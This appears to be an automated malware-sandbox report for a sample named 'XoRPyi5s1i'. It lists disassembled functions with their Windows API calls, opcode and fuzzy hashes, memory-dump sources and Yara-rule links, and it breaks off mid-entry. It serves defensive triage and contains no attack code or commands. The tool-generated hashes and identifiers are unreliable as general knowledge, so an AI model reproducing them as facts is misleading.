                                    • Opcode ID: e9f8a988c7d63890a81e607a3c8ba726dd51c1458620b6a3737c2a0bdee2f9f5
                                    • Instruction ID: c5bf9f79fd10494ca4a853716c6675800ea0ec52d474fcdc02dffde142e4501d
                                    • Opcode Fuzzy Hash: e9f8a988c7d63890a81e607a3c8ba726dd51c1458620b6a3737c2a0bdee2f9f5
                                    • Instruction Fuzzy Hash: 7201C431909A61EBC712AF65B54B75DBBA0BF04722F194005FC346FAD0CB206949CFC2
                                    Function 00157A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 00157AD8
                                      • Part of subcall function 00157CF4: __mtinitlocknum.LIBCMT ref: 00157D06
                                      • Part of subcall function 00157CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00157D1F
                                    • InterlockedIncrement.KERNEL32(?), ref: 00157AE5
                                    • __lock.LIBCMT ref: 00157AF9
                                    • ___addlocaleref.LIBCMT ref: 00157B17
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1687444384-0
                                    • Opcode ID: fb6802d1e52cdf17566d8f36146171725be2ea8eabdcfe89cfa55b627b236067
                                    • Instruction ID: 4d356d8cd1dd76b4cc76a4e69ae102fe4b7a98ce4ce3e681bac68051031d4f09
                                    • Opcode Fuzzy Hash: fb6802d1e52cdf17566d8f36146171725be2ea8eabdcfe89cfa55b627b236067
                                    • Instruction Fuzzy Hash: 32016171504B01DFD720DF75D906749B7F0EF60322F20494EE8A69B6E0CB70A688CB41
                                    Function 0019E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0019E33D
                                    • _memset.LIBCMT ref: 0019E34C
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001F3D00,001F3D44), ref: 0019E37B
                                    • CloseHandle.KERNEL32 ref: 0019E38D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: d4450b8fd0100f8a14f13c68f4693123aa2bbac1178d2fe0cb58e6220f9b3991
                                    • Instruction ID: a36ef237a8c99f49ee3f3f5cebcdceef97b565ecd3c9d8b95e49543a0a559682
                                    • Opcode Fuzzy Hash: d4450b8fd0100f8a14f13c68f4693123aa2bbac1178d2fe0cb58e6220f9b3991
                                    • Instruction Fuzzy Hash: A8F082F1540304BEE3106BE0EC45FB77EACEB08754F404421FF18EA5A2D3769E4086A8
                                    Function 0019EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                      • Part of subcall function 0014AF83: BeginPath.GDI32(?), ref: 0014B009
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014B033
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0019EA8E
                                    • LineTo.GDI32(00000000,?,?), ref: 0019EA9B
                                    • EndPath.GDI32(00000000), ref: 0019EAAB
                                    • StrokePath.GDI32(00000000), ref: 0019EAB9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: f2425cbe088482fe344c0d8dd4f8672a01eee951d90fc1b173e2171be8adf571
                                    • Instruction ID: 20c2dce5ae7faad4796298bebff0dc6e889d8b6a495c1a5c73bb2ddbcc6b0c06
                                    • Opcode Fuzzy Hash: f2425cbe088482fe344c0d8dd4f8672a01eee951d90fc1b173e2171be8adf571
                                    • Instruction Fuzzy Hash: 3AF05E3104525ABBDB16AF94AC09FCE3F59AF16321F084201FA11614F1C7B455A1CB99
                                    Function 0016C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0016C84A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0016C85D
                                    • GetCurrentThreadId.KERNEL32 ref: 0016C864
                                    • AttachThreadInput.USER32(00000000), ref: 0016C86B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: b2c21eb3434dfd925990e2ac6c43840f684d2b6bc630d6c70d71078542c49640
                                    • Instruction ID: c88687ee3d6cb8679d51c72b97c59a70d318d1bb83d8ab64b62cf424e38ba1c6
                                    • Opcode Fuzzy Hash: b2c21eb3434dfd925990e2ac6c43840f684d2b6bc630d6c70d71078542c49640
                                    • Instruction Fuzzy Hash: 89E06D71141228BADB241BA2EC0DEEB7F1CEF167A1F408121B60D95860E7B1C5D0CBE0
                                    Function 0016B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 0016B0D6
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0016AC9D), ref: 0016B0DD
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0016AC9D), ref: 0016B0EA
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0016AC9D), ref: 0016B0F1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 1318824e20d010c12fc302253c775d17ca06ff8c757bc02896598c9db95bfe3f
                                    • Instruction ID: 247d747313dbf22f7f7cd3f049647a5774df3c3842dfc30129e61cf23a04c481
                                    • Opcode Fuzzy Hash: 1318824e20d010c12fc302253c775d17ca06ff8c757bc02896598c9db95bfe3f
                                    • Instruction Fuzzy Hash: A9E086766412129BD7202FB56C0CB473BBCEF55791F018928F641D6050FB348481CB60
                                    Function 0014B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 0014B496
                                    • SetTextColor.GDI32(?,000000FF), ref: 0014B4A0
                                    • SetBkMode.GDI32(?,00000001), ref: 0014B4B5
                                    • GetStockObject.GDI32(00000005), ref: 0014B4BD
                                    • GetWindowDC.USER32(?,00000000), ref: 001ADE2B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 001ADE38
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 001ADE51
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 001ADE6A
                                    • GetPixel.GDI32(00000000,?,?), ref: 001ADE8A
                                    • ReleaseDC.USER32(?,00000000), ref: 001ADE95
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: d39bea7d1047e8daee2bd23aa0d778abf3d0c2381006b405279ae034f575c8d9
                                    • Instruction ID: c20eb9b889c8e86c1d671f34703c89d0241835cbced6d00fb10cf14b151e7dc1
                                    • Opcode Fuzzy Hash: d39bea7d1047e8daee2bd23aa0d778abf3d0c2381006b405279ae034f575c8d9
                                    • Instruction Fuzzy Hash: F7E06D35104240AADB251B78BC09BD83B21AB12336F04C326F66A984E1D7718580CB11
                                    Function 001AB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 0959b1cce9a884c5e5b677b4fb5383433e0a1dfb89c3b3aecc6168cda21b4a5a
                                    • Instruction ID: b43271019f96829e5952aae8dce25c30f7ed6d224719cc74f45866e1c2a27376
                                    • Opcode Fuzzy Hash: 0959b1cce9a884c5e5b677b4fb5383433e0a1dfb89c3b3aecc6168cda21b4a5a
                                    • Instruction Fuzzy Hash: 0AE04FB5500204EFDB045F70E88866D7BA4EB4C350F12C916FC5A87611EB7498808B50
                                    Function 001AB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 149fed72d342216e97c4893377eec135ef564e138e160c52d8fde2cb8a324aab
                                    • Instruction ID: 05711ef26221af62835ea880bfd514df5186605716547d062359ec50958f9d4d
                                    • Opcode Fuzzy Hash: 149fed72d342216e97c4893377eec135ef564e138e160c52d8fde2cb8a324aab
                                    • Instruction Fuzzy Hash: DBE046B5900200EFDB045F70E88862D7BA8EB4C350F128A1AFD5E8B620EB7898808B10
                                    Function 0017C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001344ED: __fread_nolock.LIBCMT ref: 0013450B
                                    • _wcscmp.LIBCMT ref: 0017C65D
                                    • _wcscmp.LIBCMT ref: 0017C670
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: fd4aea04454ee03053965bfd735e27d92b4887a18443da89c7a1426385823980
                                    • Instruction ID: 178ddbd67565c6b7e4518070c3eb279387246044adf2870d6067b2f4ba1f4a89
                                    • Opcode Fuzzy Hash: fd4aea04454ee03053965bfd735e27d92b4887a18443da89c7a1426385823980
                                    • Instruction Fuzzy Hash: 7241F672A0420ABBDF209BA4DC81FEF77B9AF49704F004079F619EB181D770AA44CB90
                                    Function 0019A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0019A85A
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0019A86F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    • Opcode ID: fcaee073dc56cf48fe73df0f1b5e92086e028a6eea9b30d2892b168c42c19bbe
                                    • Instruction ID: 5577cbce7814e869f33876ebfd0fbff90f3ee9b671c30262691c605c94dc9824
                                    • Opcode Fuzzy Hash: fcaee073dc56cf48fe73df0f1b5e92086e028a6eea9b30d2892b168c42c19bbe
                                    • Instruction Fuzzy Hash: AC41F675A01209AFDF14CFA8D881BEA7BB9FF08300F51006AE905AB341D771A945CFA1
                                    Function 00185180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00185190
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001851C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CrackInternet_memset
                                    • String ID: |
                                    • API String ID: 1413715105-2343686810
                                    • Opcode ID: 95bf542fe58eecd5cff625c7faab1c91b3c724fef328769132c9aaa116c4f3a4
                                    • Instruction ID: f6a43c08e8214d7102464155f5e24c64178175dab6807884f234cc0ad71692e2
                                    • Opcode Fuzzy Hash: 95bf542fe58eecd5cff625c7faab1c91b3c724fef328769132c9aaa116c4f3a4
                                    • Instruction Fuzzy Hash: E131F871800119ABCF05EFE4CC85AEEBFB9FF28750F100055F815B6166EB31AA56DBA0
                                    Function 0019975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 0019980E
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0019984A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: 8e87ef65c16c09d4bbe185b05945fb4bb52d3bf2de5332b2cdd4c4fb31fe7e31
                                    • Instruction ID: 32dde1f224de29f64d7e6aa8e9cadb8005d1d8191ddb8248b646c865a07a3578
                                    • Opcode Fuzzy Hash: 8e87ef65c16c09d4bbe185b05945fb4bb52d3bf2de5332b2cdd4c4fb31fe7e31
                                    • Instruction Fuzzy Hash: 2A316B71110608AAEF149F68DC80BBB73A9FF59760F00861DF8A9C7190DB31AC81CB60
                                    Function 00175157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 001751C6
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00175201
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 8a50526f0a7e4dc6b7cd03505292ee952ec329772cc5577ebeb5686dabb33a10
                                    • Instruction ID: 1a690137e5a8bb86d1586b4394c76bcb906338f9aecdd5be67f861461796ba52
                                    • Opcode Fuzzy Hash: 8a50526f0a7e4dc6b7cd03505292ee952ec329772cc5577ebeb5686dabb33a10
                                    • Instruction Fuzzy Hash: 0C31F831600704EBEB24CF99D845BAEBBF6FF45354F24805DE98AE61A2D7F09944CB50
                                    Function 0018658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __snwprintf
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 2391506597-2584243854
                                    • Opcode ID: b167ca1ccb1b40912d10fab2ad328b8434efd794a577bf97e73c18399bb83118
                                    • Instruction ID: 10fec74f287f9a4ffb7204ca18d54a47347814b3edeb9ee28bc5c53139661fe9
                                    • Opcode Fuzzy Hash: b167ca1ccb1b40912d10fab2ad328b8434efd794a577bf97e73c18399bb83118
                                    • Instruction Fuzzy Hash: 6521AD71A00218AFCF14EFA4DC82EAE77B5AF54740F100469F515AB181EB70EA45CBA1
                                    Function 001993CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0019945C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00199467
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
